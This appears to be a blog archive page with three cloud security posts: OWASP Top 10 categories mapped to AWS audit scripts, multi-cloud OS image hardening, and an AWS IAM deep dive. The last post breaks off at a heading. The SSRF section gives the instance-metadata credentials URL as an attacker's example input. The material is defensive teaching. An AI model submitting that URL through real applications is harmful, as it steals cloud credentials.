The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# List IAM users with console access but no MFA enrolled
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
docker inspect your-registry/your-image:tag --format='{{.Id}}'
# Compare this digest to the pinned value in your deployment manifest

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify CloudTrail is logging in all regions
aws cloudtrail describe-trails --include-shadow-trails true \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,Logging:HasCustomEventSelectors}'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had a SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication — any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved — a SSRF via GET cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP	Category	Purple Team Episode
A01	Broken Access Control	EP04: Broken access control in AWS
A02	Cryptographic Failures	EP06 (partial): CI/CD secrets exposure
A03	Injection	EP07: SSRF to cloud metadata
A04	Insecure Design	EP08: Kubernetes container escape
A05	Security Misconfiguration	EP08: Kubernetes container escape
A06	Vulnerable Components	EP09: Supply chain attacks
A07	Authentication Failures	EP05: MFA fatigue attacks
A08	SW/Data Integrity	EP06: CI/CD secrets exposure, EP09: Supply chain
A09	Logging/Monitoring Failures	EP11: Detection engineering with eBPF
A10	SSRF	EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
echo "--- GuardDuty status in current region ---"
aws guardduty list-detectors --query 'DetectorIds' --output text || echo "DISABLED"

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text || \
  echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.

Quick Reference

OWASP	Cloud Infrastructure Equivalent	Detection Tool
A01	IAM wildcards, public S3, broad trust policies	AWS Config, CloudTrail
A02	Plaintext secrets in env vars, unencrypted S3	TruffleHog, Macie
A03	SSRF, Log4j JNDI injection	WAF logs, CloudTrail IMDS calls
A04	Privileged containers, no seccomp	OPA/Gatekeeper, Falco
A05	K8s RBAC defaults, open etcd, open SGs	kube-bench, AWS Config
A06	Unpatched base images, transitive CVEs, supply chain	Trivy, Grype, SLSA
A07	MFA fatigue, long-lived sessions, stolen tokens	GuardDuty, Okta logs
A08	Unsigned images, mutable CI references, build compromise	Cosign, SLSA, OIDC
A09	No CloudTrail, no GuardDuty, no runtime telemetry	AWS Security Hub
A10	IMDSv1 on EC2, SSRF to internal endpoints	VPC Flow Logs, CloudTrail

Key Takeaways

OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through April 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes — identity, supply chain, misconfiguration — and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

One Blueprint, Six Clouds — Multi-Provider OS Image Builds

May 10, 2026April 27, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

OS Hardening as Code, Episode 3
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening**

TL;DR

Multi-cloud OS hardening with separate scripts per provider means three scripts that drift within weeks
A HardeningBlueprint YAML separates compliance intent (portable) from provider details (handled by Stratum’s provider layer)
The same blueprint builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox with a single --provider flag change
Provider-specific differences — disk names, cloud-init ordering, metadata endpoint IPs — are abstracted away from the blueprint author
One YAML file becomes the single source of truth for OS security posture across your entire fleet, regardless of cloud
Drift detection works fleet-wide: rescan any instance against the original blueprint grade on any provider

The Problem: Three Clouds, Three Scripts, Three Ways to Drift

AWS hardening script          GCP hardening script          Azure hardening script
├── /dev/xvd* disk refs       ├── /dev/sda* disk refs       ├── /dev/sda* disk refs
├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS      ├── 169.254.169.254 IMDS
├── cloud-init order A        ├── cloud-init order B        ├── cloud-init order C
└── Updated: Jan 2025         └── Updated: Aug 2024         └── Updated: Mar 2024
                                         │
                                         └─ 5 months behind
                                            on CIS updates

Multi-cloud OS hardening starts as a copy-paste of the AWS script. Within a month, the clouds diverge.

EP02 showed that a HardeningBlueprint YAML eliminates the skip-at-2am problem by making hardening a build artifact. What it assumed — quietly — is that you’re building for one provider. The moment you expand to a second cloud, the provider-specific details in the blueprint become a problem: disk names differ, cloud-init fires in a different order, and AWS-specific assumptions break silently on GCP.

We expanded from AWS to GCP six months ago. The EC2 hardening script had been working reliably for over a year. The GCP engineer took the AWS script, made some quick changes, and started building images.

The first GCP images had a subtle problem: the /tmp and /home separate partition entries in /etc/fstab referenced /dev/xvdb — an AWS disk naming convention. GCP uses /dev/sdb. The fstab entries were silently ignored. The mounts existed but weren’t restricted. The CIS controls for separate filesystem partitions were listed as passing in the scan output because the Ansible task had “run successfully” — it just hadn’t done what we thought.

It took a pentest three months later to catch it. The finding: six production GCP instances with /tmp not mounted with noexec, nosuid, nodev — despite our “CIS L1 hardened” label.

The root cause wasn’t the engineer. It was a hardening approach that required cloud-specific knowledge embedded in the script rather than in a provider abstraction layer.

How Stratum Separates Compliance Intent from Provider Details

Multi-cloud OS hardening works when the compliance intent and the provider details are kept strictly separate.

HardeningBlueprint YAML
(compliance intent — portable)
         │
         ▼
  Stratum Provider Layer
  ┌─────────────────────────────────────────────┐
  │  AWS         │  GCP         │  Azure        │
  │  /dev/xvd*   │  /dev/sda*   │  /dev/sda*    │
  │  IMDS v2     │  GCP IMDS    │  Azure IMDS   │
  │  cloud-init  │  cloud-init  │  waagent       │
  │  order A     │  order B     │  order C       │
  └─────────────────────────────────────────────┘
         │
         ▼
  Ansible-Lockdown + Provider-Aware Configuration
         │
         ▼
  OpenSCAP Scan
         │
         ▼
  Golden Image (AMI / GCP Image / Azure Image)

The blueprint author declares what should be true about the OS. Stratum’s provider layer handles how that’s achieved on each cloud.

The disk naming, cloud-init sequencing, metadata endpoint configuration, and provider-specific package repositories are all abstracted into the provider layer. They never appear in the blueprint file.

The Same Blueprint Across Six Providers

# Build the same baseline on three clouds
stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
stratum build --blueprint ubuntu22-cis-l1.yaml --provider gcp
stratum build --blueprint ubuntu22-cis-l1.yaml --provider azure

# The other three supported providers
stratum build --blueprint ubuntu22-cis-l1.yaml --provider digitalocean
stratum build --blueprint ubuntu22-cis-l1.yaml --provider linode
stratum build --blueprint ubuntu22-cis-l1.yaml --provider proxmox

The blueprint file is identical across all six. The output — AMI, GCP machine image, Azure managed image — is equivalent in terms of security posture. The same 144 CIS L1 controls apply. The same OpenSCAP scan runs. The same grade lands in the image metadata.

If you change the blueprint — add a control, update the Ansible role version, add a custom audit logging configuration — you rebuild all providers from the same source and all images come out consistent.

What the Provider Layer Handles

The provider layer is where the cloud-specific knowledge lives, so the blueprint author doesn’t have to carry it:

Disk naming:

Provider	OS disk	Ephemeral	Data
AWS	`/dev/xvda`	`/dev/xvdb`	`/dev/xvdc+`
GCP	`/dev/sda`	—	`/dev/sdb+`
Azure	`/dev/sda`	`/dev/sdb` (temp disk)	`/dev/sdc+`
DigitalOcean	`/dev/vda`	—	`/dev/vdb+`

The CIS controls for separate /tmp and /home partitions reference disk paths that differ across these providers. The provider layer translates the blueprint’s filesystem.tmp declaration into the correct fstab entries for the target cloud.

Cloud-init ordering:

Different providers initialize services in different orders. On AWS, the network is available before cloud-init runs most tasks. On GCP, some network configuration happens after cloud-init starts. On Azure, the waagent handles some configuration that cloud-init handles elsewhere.

The provider layer sequences the hardening steps to run in the correct order for each provider — specifically, it waits for network availability before applying network-level hardening, and ensures the package manager is configured before running Ansible roles that require package installation.

Metadata endpoint configuration:

CIS controls include restrictions on access to the instance metadata service (IMDSv2 enforcement on AWS, equivalent controls on GCP/Azure). The provider layer applies the correct restriction for each cloud — the blueprint just declares compliance: benchmark: cis-l1.

Building for All Providers Simultaneously

For fleet standardization, you can build all providers in a single operation:

# Build for all providers in parallel
stratum build \
  --blueprint ubuntu22-cis-l1.yaml \
  --provider aws,gcp,azure

# Output:
# [aws]   Launching build instance in ap-south-1...
# [gcp]   Launching build instance in asia-south1...
# [azure] Launching build instance in southindia...
# ...
# [aws]   Grade: A (98/100) — ami-0a7f3c9e82d1b4c05
# [gcp]   Grade: A (98/100) — projects/my-project/global/images/ubuntu22-cis-l1-20260419
# [azure] Grade: A (98/100) — /subscriptions/.../images/ubuntu22-cis-l1-20260419

All three builds run in parallel. All three images carry identical compliance grades. The image names embed the date and grade for easy identification.

Blueprint Versioning and Drift Detection

Version-controlling the blueprint file solves a problem that multi-cloud environments hit consistently: knowing what your OS security posture was six months ago.

# Check the current state of a fleet instance against the blueprint
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Compare against original build grade
# Output:
# Instance: i-0abc123 (aws, ap-south-1)
# Original grade (build): A (98/100) — 2026-01-15
# Current grade (scan):   B (89/100) — 2026-04-19
# 
# Drifted controls (9):
#   3.3.2  — TCP SYN cookies: FAIL (sysctl net.ipv4.tcp_syncookies=0)
#   5.3.2  — sudo log_input: FAIL (removed from /etc/sudoers.d/)
#   ...

Drift detection compares the current instance state against the blueprint that built it. Controls that passed at build time and now fail indicate configuration drift — something changed after the image was deployed. This is how you find the three instances that a sysadmin “temporarily” modified and never reverted.

Production Gotchas

Provider-specific CIS controls exist. CIS AWS Foundations Benchmark and CIS GCP Benchmark include cloud-specific controls (VPC flow logs, CloudTrail, etc.) that are separate from the OS-level CIS controls. The blueprint handles OS-level controls. Cloud-level controls (IAM, logging, network configuration) belong in your cloud security posture management tooling.

Build costs vary by provider. On AWS, the build instance is a t3.medium for 15–20 minutes (~$0.02). On GCP and Azure, equivalent pricing applies. For multi-provider builds, run them in regions close to your primary workloads to minimize image transfer time.

Proxmox builds require a local Stratum agent. Unlike cloud providers, Proxmox doesn’t have an API that Stratum can reach from outside. The Proxmox provider requires the Stratum agent running on the Proxmox host. The build process and blueprint format are identical; only the network topology differs.

GCP image sharing across projects requires explicit IAM. GCP machine images aren’t automatically available to other projects in the organization. After building, run stratum image share --provider gcp --image ubuntu22-cis-l1-20260419 --projects

or configure sharing at the organization level.

Key Takeaways

Multi-cloud OS hardening with separate scripts per provider creates inevitable drift; a provider-abstracted blueprint eliminates it
The same HardeningBlueprint YAML builds on AWS, GCP, Azure, DigitalOcean, Linode, and Proxmox — the compliance intent is in the file, the provider details are in Stratum’s provider layer
Parallel multi-provider builds produce images with identical compliance grades on the same schedule
Drift detection works fleet-wide: any instance on any provider can be rescanned against the blueprint that built it
Blueprint version control is the single source of truth for OS security posture history — what was true on any given date, across any provider

What’s Next

One blueprint, six clouds, identical compliance grades. EP03 showed that the multi-cloud drift problem disappears when provider details are abstracted away from the blueprint.

What neither EP02 nor EP03 answered is the auditor’s question: how do you know the image is actually compliant? “We ran CIS L1” is not an answer. “Grade A, 98/100 controls, SARIF export attached” is.

EP04 covers automated OpenSCAP compliance: the post-build scan in detail — how the A-F grade is calculated, what controls block an A grade, how SARIF exports work, and how drift detection catches what changed after deployment.

Next: automated OpenSCAP compliance — CIS benchmark grading before deployment

Get EP04 in your inbox when it publishes → linuxcent.com/subscribe

AWS IAM Deep Dive: Users, Groups, Roles, and Policies Explained

May 10, 2026April 14, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM

TL;DR

IAM users with long-lived access keys are legacy — use IAM Identity Center with federation; static keys are a security finding, not a feature
Roles issue temporary credentials via STS — the right identity model for every service (Lambda, EC2, ECS, CI/CD)
Every role has two required configs: trust policy (who can assume it) + permission policy (what it can do) — both must be correct
SCPs set the org-level ceiling; they cannot grant permissions and do not apply to the management account
Permissions boundaries set an identity-level ceiling — effective permissions are the intersection with identity-based policies, not the union
Cross-account trust without an ExternalId condition is vulnerable to the confused deputy attack — always include it with third-party trust
One role per service, never shared — a shared role’s blast radius is the union of what every consumer needs

The Big Picture

AWS IAM evaluates every API call through a specific chain. Understanding this chain is how you debug access issues and how you design guardrails that actually hold.

  AWS POLICY EVALUATION — every API call walks this chain top to bottom
  An explicit DENY at any step ends evaluation immediately.

         API call arrives
               │
               ▼
  ┌────────────────────────────┐
  │  Explicit DENY in any SCP? │── YES ──────────────────────────► DENIED
  └────────────────┬───────────┘     (cannot be overridden by anything)
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  SCP present with no ALLOW │── YES ──────────────────────────► DENIED
  └────────────────┬───────────┘
                   │ NO (or no SCP / management account)
                   ▼
  ┌────────────────────────────┐
  │  Explicit DENY in any      │── YES ──────────────────────────► DENIED
  │  identity or resource      │
  │  policy?                   │
  └────────────────┬───────────┘
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  Resource-based policy     │── YES (same-account principal) ──► ALLOWED*
  │  with ALLOW?               │
  └────────────────┬───────────┘   *unless denied above
                   │ NO
                   ▼
  ┌────────────────────────────┐
  │  Permissions boundary      │── YES, boundary has NO ALLOW ───► DENIED
  │  attached?                 │
  └────────────────┬───────────┘
                   │ NO boundary, or boundary ALLOWS
                   ▼
  ┌────────────────────────────┐
  │  Session policy attached   │── YES, session has NO ALLOW ────► DENIED
  │  (role assumption)?        │
  └────────────────┬───────────┘
                   │ NO session policy, or session ALLOWS
                   ▼
  ┌────────────────────────────┐
  │  Identity-based policy     │── YES ──────────────────────────► ALLOWED
  │  with ALLOW?               │
  └────────────────┬───────────┘
                   │ NO
                   ▼
                DENIED (default — nothing explicitly granted)

  Debugging AccessDenied: work bottom-up.
  Start with the identity-based policy. Then boundary. Then SCP.

Introduction

An AWS IAM deep dive reveals what most teams miss: the difference between an IAM model that works under deadline and one that survives scale, audits, and staff turnover. If you’ve read IAM roles vs policies and understand the three-layer stack, this is where it becomes specific to AWS — trust policies, SCPs, permissions boundaries, cross-account trust, and Identity Center.

In 2017 I was asked to help clean up an AWS account that had been running in production for two years. The team had built something real — a microservices application, a data pipeline, a CI/CD system. Competent engineers. But nobody had been specifically accountable for IAM.

When I pulled the configuration:

One IAM user with AdministratorAccess shared by the entire dev team. Password in a shared password manager. Access key three years old.
Six Lambda functions each carrying AWSLambdaFullAccess, AmazonS3FullAccess, and AmazonDynamoDBFullAccess — three broad managed policies each, instead of one custom policy with what each function actually needed.
A CI/CD pipeline role with iam:* on * because someone once needed to create a role during a deployment and found that the easiest path.
Three IAM users for contractors who had finished their engagements months earlier. Still active, access keys still valid.

None of this was malicious. All of it was the result of reaching for the broadest thing that works, under deadline, without a framework for IAM decisions.

AWS IAM is the most flexible cloud IAM system. That flexibility is the problem. If you don’t know the full model, you default to broad grants because they’re easier to reason about. Broad things accumulate into exposure. This episode is the full model.

AWS IAM Identity Types: Users, Groups, and Roles Compared

IAM Users: Why Static Access Keys Are a Security Finding

An IAM user is a permanent identity with long-lived credentials: a password for console access, and optionally an access key pair. No expiry on the access key by default.

# Create a user
aws iam create-user --user-name alice

# Generate an access key — no expiry unless you set one
aws iam create-access-key --user-name alice

# Enforce MFA for console access
aws iam create-virtual-mfa-device \
  --virtual-mfa-device-name alice-mfa \
  --outfile /tmp/alice-mfa.png \
  --bootstrap-method QRCodePNG

aws iam enable-mfa-device \
  --user-name alice \
  --serial-number arn:aws:iam::123456789012:mfa/alice-mfa \
  --authentication-code1 123456 \
  --authentication-code2 654321

The access key exists the moment you create it. It survives team changes, org restructures, and offboarding unless someone explicitly deletes it. In practice, access keys are where I find the oldest, most-forgotten credentials in every AWS account I’ve audited.

Current best practice: don’t create IAM users for human access. Use IAM Identity Center with federation. Static access keys are a finding, not a feature.

IAM groups — useful but limited

Groups are collections of users. Policies attached to a group apply to all members. Useful as a middle layer, but limited: you can’t add roles or services to a group, and if you’re moving toward Identity Center, groups in IAM become less relevant.

aws iam create-group --group-name Backend-Developers
aws iam attach-group-policy \
  --group-name Backend-Developers \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess
aws iam add-user-to-group --group-name Backend-Developers --user-name alice

IAM Roles: How STS Temporary Credentials Work

A role is an identity without permanent credentials. It is assumed by entities — services, users, external systems — and STS issues temporary credentials. Those credentials expire. Nothing to rotate.

# Create a role that EC2 can assume
cat > ec2-trust-policy.json << 'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "Service": "ec2.amazonaws.com" },
    "Action": "sts:AssumeRole"
  }]
}
EOF

aws iam create-role \
  --role-name AppServerRole \
  --assume-role-policy-document file://ec2-trust-policy.json

aws iam attach-role-policy \
  --role-name AppServerRole \
  --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

# EC2 needs an instance profile to carry the role
aws iam create-instance-profile --instance-profile-name AppServerProfile
aws iam add-role-to-instance-profile \
  --instance-profile-name AppServerProfile \
  --role-name AppServerRole

# Launch with the profile
aws ec2 run-instances \
  --image-id ami-0abcdef1234567890 \
  --instance-type t3.micro \
  --iam-instance-profile Name=AppServerProfile

From inside the instance — no credential files, no configuration:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AppServerRole
# Returns: AccessKeyId, SecretAccessKey, Token, Expiration
# AWS refreshes these before they expire. The application never sees a rotation event.

Lambda, ECS, and other services use different attachment mechanisms but the same model.

AWS IAM Policy Types: Managed, Inline, SCP, and Boundaries

Managed vs inline policies

┌────────────────────┬──────────────────────────────────┬──────────────────────────────────────┐
│ Type               │ Description                      │ Use when                             │
├────────────────────┼──────────────────────────────────┼──────────────────────────────────────┤
│ AWS Managed        │ Created by AWS, read-only        │ Quick prototyping; never production  │
│ Customer Managed   │ Created by you, reusable         │ Standard production permissions      │
│ Inline             │ Embedded in user/group/role      │ Explicit 1:1 non-transferable binding│
└────────────────────┴──────────────────────────────────┴──────────────────────────────────────┘

AWS Managed policies like AmazonS3FullAccess are convenient and dangerous for the same reason: broad by design, meant to cover every use case. For a Lambda that reads one specific bucket, AmazonS3FullAccess grants approximately 30 permissions you didn’t need.

# Create a customer managed policy — scoped to what the Lambda actually does
cat > lambda-reader-policy.json << 'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "ReadSpecificBucket",
    "Effect": "Allow",
    "Action": ["s3:GetObject", "s3:ListBucket"],
    "Resource": [
      "arn:aws:s3:::app-data-prod",
      "arn:aws:s3:::app-data-prod/*"
    ]
  }]
}
EOF

aws iam create-policy \
  --policy-name LambdaS3ReadPolicy \
  --policy-document file://lambda-reader-policy.json

aws iam attach-role-policy \
  --role-name lambda-image-processor-role \
  --policy-arn arn:aws:iam::123456789012:policy/LambdaS3ReadPolicy

Service Control Policies — org-wide guardrails

SCPs attach to AWS Organization OUs or accounts. They define the maximum permissions any identity in that scope can have. They cannot grant — only restrict.

Two SCPs I apply to every account from day one:

// Region restriction — blast radius control
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": "*",
    "Resource": "*",
    "Condition": {
      "StringNotEquals": {
        "aws:RequestedRegion": ["ap-south-1", "us-east-1", "eu-west-1"]
      }
    }
  }]
}

// Protect the audit trail — anti-forensics control
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": [
      "cloudtrail:StopLogging",
      "cloudtrail:DeleteTrail",
      "cloudtrail:UpdateTrail"
    ],
    "Resource": "*"
  }]
}

The region restriction limits where compromised credentials can operate. The CloudTrail restriction means even an AdministratorAccess compromise cannot erase the audit trail. The attacker knows they’re being logged and cannot stop it. This is the authorization layer — understanding authentication vs authorization makes clear why SCPs operate at Gate 2, not Gate 1.

Permissions boundaries — identity-level ceilings

A permissions boundary sets the maximum permissions for a specific user or role. Effective permissions are the intersection of what the boundary allows and what identity-based policies grant.

Boundary allows:  s3:*, dynamodb:*
Identity policy:  s3:*, ec2:*
──────────────────────────────────
Effective:        s3:*             ← the intersection only

// Boundary: this role can use at most S3 and DynamoDB
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Action": ["s3:*", "dynamodb:*"],
    "Resource": "*"
  }]
}

aws iam put-role-permissions-boundary \
  --role-name DevTeamRole \
  --permissions-boundary arn:aws:iam::123456789012:policy/DevTeamBoundary

I use permissions boundaries for safe IAM delegation. When a dev team needs to create their own roles for their services, I give them iam:CreateRole and iam:AttachRolePolicy — but require any role they create to have a specific boundary. They can self-service IAM without accidentally creating a role more powerful than their team should have.

How AWS Cross-Account IAM Trust Works

AWS accounts are IAM isolation boundaries. An identity in Account A has zero access to Account B by default. Cross-account access requires explicit trust in both directions.

Account B creates a role with a trust policy naming Account A's identity.
Account A's identity has permission to call sts:AssumeRole on that role.

// Account B: trust policy on the cross-account role
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "AWS": "arn:aws:iam::ACCOUNT_A_ID:role/DeployPipelineRole"
    },
    "Action": "sts:AssumeRole",
    "Condition": {
      "StringEquals": { "sts:ExternalId": "unique-external-id-12345" }
    }
  }]
}

# Account A: the pipeline assumes the cross-account role
aws sts assume-role \
  --role-arn arn:aws:iam::ACCOUNT_B_ID:role/DeployTarget \
  --role-session-name pipeline-deploy \
  --external-id unique-external-id-12345

# Export the temporary credentials and operate in Account B
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
aws s3 ls s3://account-b-bucket/

The ExternalId condition prevents the confused deputy attack. Without it, if you operate a service that assumes roles on behalf of customers, an attacker who knows your service’s ARN can trick it into assuming their customer’s role.

The ExternalId is a shared secret proving the party requesting assumption is the one who established the trust. Always include it for third-party cross-account trust.

AWS IAM Identity Center: Federated Human Access Without Static Keys

IAM Identity Center (formerly AWS SSO) is the modern answer to “how do engineers access AWS accounts?” It federates an external IdP and maps your organization’s groups to Permission Sets.

  Okta / Google Workspace / Entra ID
    ↓ SAML 2.0 or OIDC
  IAM Identity Center
    ↓ Permission Sets (collections of policies)
  Account Assignments (group → permission set → account)
    ↓
  Temporary credentials in each target account (no long-lived keys)

# Configure CLI access via Identity Center
aws configure sso
# Prompts: SSO start URL, region, account, role

# Login — browser opens for IdP auth
aws sso login --profile prod-admin

# Use normally — credentials are temporary and auto-refreshed
aws s3 ls --profile prod-admin
aws ec2 describe-instances --profile prod-admin

When someone leaves the organization: disable them in your IdP. Their SSO session expires, their temporary credentials expire, access is gone. That’s it — no access key hunting across 20 accounts.

AWS IAM Patterns for Production: What Survives Scale

Every Lambda, ECS task, and EC2 application gets its own role. Even two Lambdas doing similar things. The moment you share a role, its permissions are the union of what each consumer needs — and a compromise of one consumer exposes the full union.

# Dedicated execution role — specific to this function's actual needs
aws iam create-role \
  --role-name lambda-invoice-processor-role \
  --assume-role-policy-document \
  '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"lambda.amazonaws.com"},"Action":"sts:AssumeRole"}]}'

aws iam put-role-policy \
  --role-name lambda-invoice-processor-role \
  --policy-name InvoiceProcessorPolicy \
  --policy-document file://lambda-invoice-processor-policy.json

IAM escalation guardrail

Any role that isn’t an explicit IAM admin should have a guardrail blocking escalation actions:

{
  "Sid": "DenyIAMEscalation",
  "Effect": "Deny",
  "Action": [
    "iam:CreateUser", "iam:CreateRole", "iam:AttachRolePolicy",
    "iam:PutRolePolicy", "iam:PassRole", "iam:CreateAccessKey"
  ],
  "Resource": "*",
  "Condition": {
    "StringNotEquals": {
      "aws:PrincipalArn": "arn:aws:iam::123456789012:role/InfraAdminRole"
    }
  }
}

Even if a role gets over-permissioned, it cannot create users, escalate its own privileges, or pass roles to expand its access. Defense in depth against the privilege escalation paths covered in AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise.

Least privilege with tag conditions

{
  "Effect": "Allow",
  "Action": ["ec2:StartInstances", "ec2:StopInstances", "ec2:RebootInstances"],
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringEquals": {
      "aws:ResourceTag/Environment": "dev",
      "aws:ResourceTag/Owner": "${aws:username}"
    }
  }
}

A developer can control EC2 instances in dev — specifically the ones tagged as theirs. Not prod. Not someone else’s instances. ABAC layered on a role, eliminating a class of privilege escalation through direct resource access.

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
